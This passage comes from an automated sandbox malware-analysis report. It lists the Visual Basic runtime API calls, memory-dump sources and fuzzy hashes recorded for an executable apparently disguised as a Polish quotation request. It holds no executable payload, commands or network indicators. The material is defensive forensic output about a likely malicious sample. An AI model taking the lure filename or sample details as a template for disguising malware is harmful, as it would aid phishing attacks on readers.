                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042908E
                                                                                                                                                                                                                                                      • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,Function_000032B6), ref: 004290D4
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004290E3
                                                                                                                                                                                                                                                      • __vbaVarVargNofree.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004290F6
                                                                                                                                                                                                                                                      • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,Function_000032B6), ref: 004290FD
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429108
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60 ref: 00429120
                                                                                                                                                                                                                                                      • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00429146
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00429152
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(0042917A,?,?,?,?,?,?,Function_000032B6), ref: 00429173
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3705209087-0
                                                                                                                                                                                                                                                      • Opcode ID: 81121c5470669a7c16739aa6be5f71145eac563f112db7cdea347d1295e6e5d1
                                                                                                                                                                                                                                                      • Instruction ID: f347cf2a893cf853362eea099f11493267eac5c9acb7e4d5a4fc20cfa02f8f68
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81121c5470669a7c16739aa6be5f71145eac563f112db7cdea347d1295e6e5d1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70310975900209DFDB00DF94C989BDEBBB4FF08314F108269F915A7390C774AA85CB94
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5D9
                                                                                                                                                                                                                                                      • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E1
                                                                                                                                                                                                                                                      • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E9
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0041D5EB
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(0041D664), ref: 0041D64B
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041D650
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041D658
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041D661
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0041D680
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$AddrefFree$DestructErrorExitOverflowProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2473607959-0
                                                                                                                                                                                                                                                      • Opcode ID: cb108ea1c80cccade74e7f213af0347de610002038ec2a835772024163612513
                                                                                                                                                                                                                                                      • Instruction ID: 9264f18109a120e7ce87413fc4b53469814454bba0ef014958fd4b23833393e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb108ea1c80cccade74e7f213af0347de610002038ec2a835772024163612513
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7F04F71C50218AFDB04EBA0ED55BED7B34EF48700F508426E506A70B4EF786A85CFA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001,?,00402F88,?,?,?,?,?,00000000,004032B6), ref: 00428CF6
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D27
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D42
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 00428D95
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$CheckExitHresultProc$FreeOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1609803294-0
                                                                                                                                                                                                                                                      • Opcode ID: 21ddd133c35a2055249bfdced58ced3040ae018b58796bb9847fdddddb7096ca
                                                                                                                                                                                                                                                      • Instruction ID: 288edfe35e9085eef6f99ea30057e2506a503dbf0f3c7e11b8dd8825ff45c2f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21ddd133c35a2055249bfdced58ced3040ae018b58796bb9847fdddddb7096ca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35417E75E01218EFC710DF98D948A9DBBB8FF58B10F50416BF805B7290CB7859418BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 0040D56C
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
                                                                                                                                                                                                                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0040D611
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 306309671-0
                                                                                                                                                                                                                                                      • Opcode ID: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
                                                                                                                                                                                                                                                      • Instruction ID: d803e8ae1a74f1de2285c6eb7d8813a05e13e9447d060414ac64bef4c706b468
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB318E70900218FFDB10DF95DD89E9EBBB8FF08B04F10456AF545B7290D77899448BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60(6CF8D83C,00000000), ref: 0042510E
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60(x.@,6CF8D83C,00000000), ref: 00425122
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 00425167
                                                                                                                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 00425172
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba_adj_fdiv_m64
                                                                                                                                                                                                                                                      • String ID: x.@
                                                                                                                                                                                                                                                      • API String ID: 2746309926-3631786054
                                                                                                                                                                                                                                                      • Opcode ID: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
                                                                                                                                                                                                                                                      • Instruction ID: e2d31677cc0c5545fa80c966f8e09b0dd77fe682f18f487efa9605fdaabcacac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD216831B046119FD7099F14FA4433BBBA6B7C8341F55867EE485D22A4CB788895C749
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291EA
                                                                                                                                                                                                                                                      • __vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291F8
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429203
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429223
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042922C
                                                                                                                                                                                                                                                      • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429236
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042923F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2392155486-0
                                                                                                                                                                                                                                                      • Opcode ID: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
                                                                                                                                                                                                                                                      • Instruction ID: 083221939679d71a8f0af14ea155fa08f788ddfb085ab1f4567514e6edbf7ed0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64119A71940654BBCB00AFA4CE49E9EBBB8FF48B00F10806AF841B22A1C77815408BF9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 00428BBE
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,00428C0D), ref: 00428BE2
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BEA
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BF2
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BFA
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C02
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C0A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Destruct$ExitProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1594393734-0
                                                                                                                                                                                                                                                      • Opcode ID: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
                                                                                                                                                                                                                                                      • Instruction ID: 9365795d6c175bddc2ceeb307a93c3593e60e9969e1da01e8ce20a231f89a0e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE0ACB29441286AEB4097D0EC41FBD7B3CEB84701F44411AF606AA0989AA42A44CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(6CF8D8B1,6CF7A323,00000000), ref: 00415F0F
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34,6CF8D8B1,6CF7A323,00000000), ref: 00415F27
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 00415F9E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckErrorHresultSystem$FreeNew2
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4095944179-0
                                                                                                                                                                                                                                                      • Opcode ID: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
                                                                                                                                                                                                                                                      • Instruction ID: 86e52eac19165ff6a91ac7dd53a600c53f32cd3851e5c07b860265a300e2eb8b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA218674A00645EBCB20DBA4EE89FDEBB74EB58741F50012AF145B31E0D77859428BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0041A8A0,?,?,00000000,Function_000032B6), ref: 0041A4BE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A4EE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A2B0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A2B0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
                                                                                                                                                                                                                                                        • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
                                                                                                                                                                                                                                                        • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
                                                                                                                                                                                                                                                        • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?), ref: 0041A475
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000,?,?,?,?,00000000,Function_000032B6), ref: 0041A51C
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A53C
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A559
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041A575
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$System$Chkstk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1207130036-0
                                                                                                                                                                                                                                                      • Opcode ID: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
                                                                                                                                                                                                                                                      • Instruction ID: 0ffcf597171400e777aa296a20f0d346976af0d8bd5363bbaeaa7b020b9ff71b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5821D8B5D00648EBDB00EFE5DA49BDEBBB4FB48714F108269E500B7390C7795A44CBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292BF
                                                                                                                                                                                                                                                      • __vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292CD
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292D8
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292F8
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429301
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429307
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2075080343-0
                                                                                                                                                                                                                                                      • Opcode ID: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
                                                                                                                                                                                                                                                      • Instruction ID: 9ff539ebce5fad2b4699ffef5be23d845548c77eebf422f0d85762e4eecb91bf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88018B71940214ABCB00AFA4CE48E9EBBB8FF48701F50406AF845B22A0CB7C55008AB9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 004200BC
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 004200C6
                                                                                                                                                                                                                                                      • #529.MSVBVM60(00004008), ref: 004200E2
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 004200EF
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00420142), ref: 00420123
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CloseFile$#529DestructExitFreeProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4288299288-0
                                                                                                                                                                                                                                                      • Opcode ID: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
                                                                                                                                                                                                                                                      • Instruction ID: e63006f6629530c6f9d06262b1e3e783061ea391c4db22c70a24105a95955a76
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
